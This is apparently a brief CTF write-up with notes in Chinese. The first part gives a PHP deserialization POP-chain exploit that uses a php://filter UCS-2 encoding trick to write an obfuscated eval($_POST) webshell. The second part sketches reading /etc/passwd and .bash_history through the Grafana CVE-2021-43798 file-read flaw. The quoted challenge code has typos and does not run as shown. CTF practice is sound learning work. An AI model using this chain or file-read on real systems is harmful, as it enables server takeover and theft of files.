0x01POP
<?php
class catf1ag1{
public $hzy;
public $arr;
function __show()
{
show_source(__FILE__);
}
function __wakeup()
{
foreach($this->arr as $k=>$v)
{
print_r($v)
var_dump($v)
echo $this->hzy->$v;
echo "</br>hzy是什么鬼???";
}
}
}
class catf1ag2{
public $file;
public $txt ;
function __get($key){
if($key == 'pputut'){
return $this->pputut();
}else{
return '<p>'.htmlspecialchars($key).'</p>';
}
}
function pputut()
{
if( strpos($file,'../') !== false || strpos($file,'\\') !== false )
{
die();
}
$content="<?php die('stupid')? >";
echo "NICE"
$content.=$this->txt;
var_dump($this->file);
file_put_contents($file,$content);
reutrn htmlspecialchars($content);
}
}
一开始,通过catflag1的$this->hzy->$v;
来调用catflag2的 __get($key)
并且满足 key='pputut'
过程没有搞得太清楚
<?php
class catf1ag1{
public $hzy;
public $arr;
function __construct()
{ $this->hzy=new catf1ag2();
$this->arr=array('pputut');
}
}
class catf1ag2{
public $file;
public $txt ;
function __construct()
{ $this->file='php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php';
$this->txt='aaa?<hp pvela$(P_SO[T]1;)>?';
}
function __get($key){
if($key == 'pputut'){
return $this->pputut();
}else{
return '<p>'.htmlspecialchars($key).'</p>';
}
}
}
$a=new catf1ag1();
echo base64_encode(serialize($a));
?>
0x02 history
[!info]
grafana任意读取文件漏洞(CVE-2021-43798)
然后首先读取/etc/passwd发现有grafana用户,尝试读取.bash_history
得到flag